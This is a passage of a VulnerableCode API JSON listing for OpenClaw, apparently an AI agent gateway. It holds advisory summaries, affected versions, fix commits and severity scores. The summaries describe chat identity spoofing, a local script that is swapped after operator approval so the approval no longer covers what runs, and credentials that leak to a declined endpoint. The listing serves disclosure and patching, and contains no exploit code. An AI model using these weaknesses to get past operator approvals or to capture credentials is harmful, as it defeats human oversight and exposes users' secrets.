`<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `4b9542716c` (`Gateway: require verified scope for chat provenance`).", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41299", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20486", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20434", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20474", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41299" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/4b9542716c26ac77652bcaa0f562043b298b409f", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/4b9542716c26ac77652bcaa0f562043b298b409f" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6xg4-82hv-cp6f", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:38:14Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6xg4-82hv-cp6f" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41299", "reference_id": "CVE-2026-41299", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41299" }, { "reference_url": "https://github.com/advisories/GHSA-6xg4-82hv-cp6f", "reference_id": "GHSA-6xg4-82hv-cp6f", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-6xg4-82hv-cp6f" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-client-identity-spoofing-in-chat-send-gateway-provenance-guard", "reference_id": "openclaw-client-identity-spoofing-in-chat-send-gateway-provenance-guard", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:38:14Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-client-identity-spoofing-in-chat-send-gateway-provenance-guard" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-41299", "GHSA-6xg4-82hv-cp6f" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-24m7-jx1g-hqde" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89353?format=api", "vulnerability_id": "VCID-258k-a4dw-tfae", "summary": "OpenClaw: pnpm dlx approvals did not bind local script operands\n## Summary\n\nBefore OpenClaw 2026.4.2, `pnpm dlx` approval planning did not bind local script operands the same way as related `pnpm exec` flows. A local script approved through a `pnpm dlx` path could be replaced before execution without invalidating the approval.\n\n## Impact\n\nAn operator could approve a benign local script and then execute modified script contents through the still-valid approval plan. This was an approval-integrity bug in the node-host command-planning path.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `176c059b05357df1bc09d4328a2380670859eeff` — bind local scripts in `pnpm dlx` approval plans\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @Kazamayc for reporting.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/176c059b05357df1bc09d4328a2380670859eeff", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/176c059b05357df1bc09d4328a2380670859eeff" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w6wx-jq6j-6mcj", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w6wx-jq6j-6mcj" }, { "reference_url": "https://github.com/advisories/GHSA-w6wx-jq6j-6mcj", "reference_id": "GHSA-w6wx-jq6j-6mcj", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-w6wx-jq6j-6mcj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api", "purl": "pkg:npm/openclaw@2026.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2" } ], "aliases": [ "GHSA-w6wx-jq6j-6mcj" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-258k-a4dw-tfae" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90123?format=api", "vulnerability_id": "VCID-26kp-dbu2-pqej", "summary": "OpenClaw: Endpoint persists after trust decline, leaking gateway credentials\n## Summary\nRemote onboarding preserves attacker-discovered endpoint after trust decline, routing gateway credentials to it\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Real shipped onboarding trust-decline bug because the declined discovered URL survived into the manual prompt, but operator acceptance of that prefill is still required, so medium.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `2a75416634837c21ed05b8c3ed906eb7a7807060` — 2026-03-30T20:03:06+01:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @zsxsoft for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41300", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11185", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11219", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11226", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41300" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/2a75416634837c21ed05b8c3ed906eb7a7807060", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:02:56Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/2a75416634837c21ed05b8c3ed906eb7a7807060" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9f4w-67g7-mqwv", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:02:56Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9f4w-67g7-mqwv" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41300", "reference_id": "CVE-2026-41300", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41300" }, { "reference_url": "https://github.com/advisories/GHSA-9f4w-67g7-mqwv", "reference_id": "GHSA-9f4w-67g7-mqwv", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9f4w-67g7-mqwv" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-attacker-discovered-endpoint-preservation-in-remote-onboarding", "reference_id": "openclaw-attacker-discovered-endpoint-preservation-in-remote-onboarding", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:02:56Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-attacker-discovered-endpoint-preservation-in-remote-onboarding" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { 